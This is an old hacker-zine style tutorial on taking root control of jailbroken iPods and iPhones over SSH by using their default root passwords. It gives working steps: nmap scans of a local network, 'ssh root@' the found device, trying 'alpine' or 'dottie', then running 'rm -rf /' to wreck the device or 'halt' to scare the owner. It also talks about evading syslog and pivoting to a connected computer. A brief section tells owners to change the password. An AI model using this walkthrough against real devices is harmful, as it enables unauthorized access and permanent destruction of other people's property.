Decided to give this a Phrack-ish type layout because I think I'm addicted to Phrack :P anyway let's begin. [center]|=-----------------------------------------------------------------------=| |=--------=[ Exploiting jailbroken iPods / iPhones via SSH ]=--------=| |=-----------------------------------------------------------------------=| |=---------------=[ By: Chroniccommand ]=--------------=| |=---------------=[ CodeShock.org ]=--------------=| |=---------------=[ ]=--------------=| |=---------------=[ chroniccommand@gmail.com ]=--------------=| |=-----------------------------------------------------------------------=|[/center] ---[ Contents
1 - Introduction
2 - How it works 2.1 - What else you can do
3 - The exploit 3.1 - From a computer 3.2 - From you're mobile device
4 - Protecting yourself
5 - Conclusion
--[ 1 - Introduction
This paper / tutorial is a simple tutorial on exploiting jailbroken iPod / iPhone's. The exploit is simple, but it can be hard to find vulnerable victims. The victim has to have his device jailbroken and have installed SSH. About 70% of iPod touch / iPhone owners have a jailbroken device.
--[ 2 - How it works
Let me first break down the basics of this simple exploit. When a user jailbreaks there device they get many new options not available to a confined device. You can have themes, free apps etc. Vulnerabilities can be opened to the device too. For this vulnerability to be opened, the user needs to have installed some packages from the jailbroken app database such as 'cydia' or 'icy'. When you first jailbreak you're mobile device and install cydia it installs some packages for you such as core-utils. So getting back to the exploit, the user needs to have installed openSSH on there device. When you first jailbreak you're mobile device you can have root access to you're device. Apple thinks they are clever and set a default root password which was easily cracked by the iPhone dev-team. The first generation iPod touch / iPhone's default root password was 'dottie'. The second generation is 'alpine'. Unfortunately if the user was smart enough to change there password you may have no way in. This exploit depends on the laziness of the owner not to change the default password. To preform the exploit the owner must have SSH open and have the default password still set. All we must do is ssh to the device's root user and from there we have complete control. This can be preformed from a computer or you're own device. To preform this exploit from you're own mobile device you need to have mobile terminal installed from you're jailbroken package manager (Such as cydia or icy). This will be explained in further detail in section 3.2. If the owner is smart enough he can check his syslog (If it is installed) too see who accessed it and from what IP. This won't matter if we totally fuck up everything though, so the owner wont be able to check his syslog. The syslog is installed through the package manager and toggled through a package called SBsettings. The SBsettings is activated by a swipe at the top of the screen. From there the owner can toggle syslog and view the path of syslog. By default the syslog path is in '/var/log/syslog'. syslog is always a good thing to have installed on you're mobile device just in case you're device has been intruded. But going back to the exploit, I will now move onto the next section.
----[ 2.1 - What else you can do
Once you have preformed the exploit and have root access you can have complete control over the mobile device. You can do anything you want. Which includes changing wallpaper, rm -rf /, viewing files, and even accessing a computer if it is plugged in. iTunes uses the 'MobileDevice Library'. The code is provided here: http://theiphonewiki.com/wiki/index.php ... ce_Library Along with some more information on the MobileDevice Library. There is a way to worm you're way into a computer on the exploited device and having some more access there. This is a very hard technique and will not be explained here. Having root means you can do anything that you want. So go crazy and fuck that device up.
--[ 3 - The exploit
In this section I will finally be explaining how to preform this exploit that you've been reading about. Let's say there is an iPod connected to you're network, it has SSH open, and the default password is still enabled. But how you ask? It's quite simple actually. First, preforming it on a computer.
---- [ 3.1 - From a computer
This subsection is for preforming it on a computer. In this guide I am using Linux. I have nmap installed and of course, SSH. Nmap is for the port scan to see if SSH is open and SSH is of course, to SSH into the target device. Lets begin. First I do an nmap scan on my router (192.168.1.1) like so: 'nmap -sS 192.168.1.1/24' <= You must be root to run this scan. I get a couple open computers on my network, and one iPod touch (192.168.1.4). Now let's do a scan on the iPod touch. 'nmap -sS 192.168.1.4'. We should get some result's saying we have port 22 (SSH) open! If it's open you could be lucky. Now for the second part of this simple exploit. I still have my terminal (root access) open. We must ssh to root@192.168.1.4. Easy. The command is simple. 'ssh root@192.168.1.4'. If we are lucky it will ask us to accept the fingerprint, just type yes. Now it asks for a password. We just have to try the 'dottie' or 'alpine'. Usually the password is 'alpine'. So I try 'alpine'. I wait a second as it tries to connect, anxiously waiting to see if I get root access. Success! I get iPod-touch:~ root# That means we have root access via SSH. Now lets fuck them up and do an rm -rf /. After preforming that the iPod touch should turn off.. and never turn back on. rm -rf / is very mean though, as the owner will need to buy a new iPod touch because you cant restore it after that. We can also turn it off to scare the owner by typing 'halt'. You should get connection lost. This means the iPod successfully shut off with the halt command. Congratulations! You just exploited an iPod touch via SSH.
---- [ 3.2 - From you're mobile device
Now we will exploit this through you're mobile device. First we must install mobile terminal and nmap. Mobile terminal is exactly what it sounds like, it's a Unix like terminal with similar commands but on you're mobile device. So we preform the same as above, but through mobile terminal. It's as simple as that. No need for more on this section. But I would like to add you can download the app 'Snap' from the app store. Snap is a network scanner combined with a port scanner. I prefer it more than nmap on a mobile device but you're call on what you want to use.
--[ 4 - Protecting yourself
Now after reading this, if you are a mobile device owner with a jailbroken iPod or iPhone you may want to protect yourself. It's pretty easy. Just go into mobile terminal and type 'su' and proved you're default root password (Depending on generation type). From there all you need to type when you are root is 'passwd'. This will issue a command to change you're root password. I recommend changing it to something nobody would guess so you don't get fucked over. After inputting you're password it will ask you again, just put the same one in. You are now protected from potential attacks.
--[ 5 - Conclusion
I wrote this guide to inform and protect anybody with a mobile device. This exploit has been around since SSH was ported to the iPod touch / iPhone. The exploit is simple and fun to preform. I hope to code a simple backdoor somewhere in the near future and see how it works out. Keep you're eyes open for it.